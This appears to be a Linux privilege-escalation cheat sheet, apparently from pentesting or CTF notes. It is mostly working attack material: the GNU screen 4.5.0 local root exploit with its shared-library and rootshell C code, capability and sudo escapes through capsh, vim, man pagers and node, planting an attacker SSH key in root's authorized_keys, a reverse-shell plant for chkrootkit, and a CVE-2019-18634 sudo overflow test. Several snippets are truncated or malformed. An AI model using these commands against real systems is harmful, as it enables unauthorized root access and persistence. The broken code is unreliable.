All of this is for unique suid, sudo or capabilities. Any common one please check GTFOBins!. You can check the references below for more good site for this :)
All of these file do it on your machine first then transfer the file to your targets.
Save the file in libhax.c. Then compile like the command below:
# Command to Compile
gcc -fPIC -shared -ldl -o libhax.c
# Script To Save (libhax.c)
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
printf("[+] done!\n");
Save the file in rootshell.c. Then compile like the command below:
# Command to Compile
gcc -o rootshell rootshell.c
# Script To Save (rootshell.c)
#include <stdio.h>
int main(void){
execvp("/bin/sh", NULL, NULL);
Save the file in like below:
# setuid screen v4.5.0 local root exploit
# abuses overwriting to get root.
# bug:
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
echo "[+] Now we create our /etc/ file..."
cd /etc
umask 000 # because
screen -D -m -L echo -ne "\x0a/tmp/" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
After that please transfer all of the files and chmod 777 all the transfer files on your target machine. Run like below and get rooted!
Link => ExploitDB-41154
- Just run the binary hping3
- Type any commands like id or you can go anywhere as a root.
- /usr/sbin/capsh --keep=1 --user=root -- -c bash -p
- /usr/sbin/capsh -- -p
# Depends on python (sometimes)
- vim.basic -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
- vim.basic -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
[1] Case 1: If there is no default pager (less)
- sudo /bin/man -P /usr/bin/less man
* Then !/bin/sh
- sudo PAGER=/usr/bin/less /bin/man man
* Then !/bin/sh
[2] Case 2: If there is no less pager
- Create /tmp/cat
* Contains
mkdir /root/.ssh
echo '<YOUR AUTHORIZED_KEYS>' > /root/.ssh/authorized_keys
chmod 600 authorized_keys
- sudo /bin/man -P /tmp/cat man
- Now you can ssh root@IP -i id_rsa
- sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
Link => Local root exploit in Chkrootkit
- '/tmp/update' is executed every time when Chkrootkit is executed so check the cron for find when chkrootkit is launched .
- So make a new file name update in /tmp.
- Put a reverse shell inside update and wait for chkrootkit to execute!
Link => CVE-2019-18634
- Sudo versions 1.7.1 to 1.8.30 inclusive are affected but only if the pwfeedback option is enabled in sudoers.
- You can test using this commands
-> perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S /bin/bash
-> if got segmentation fault means you can exploit this.
- wget
- gcc exploit.c -o exploit
- Then run the exploit!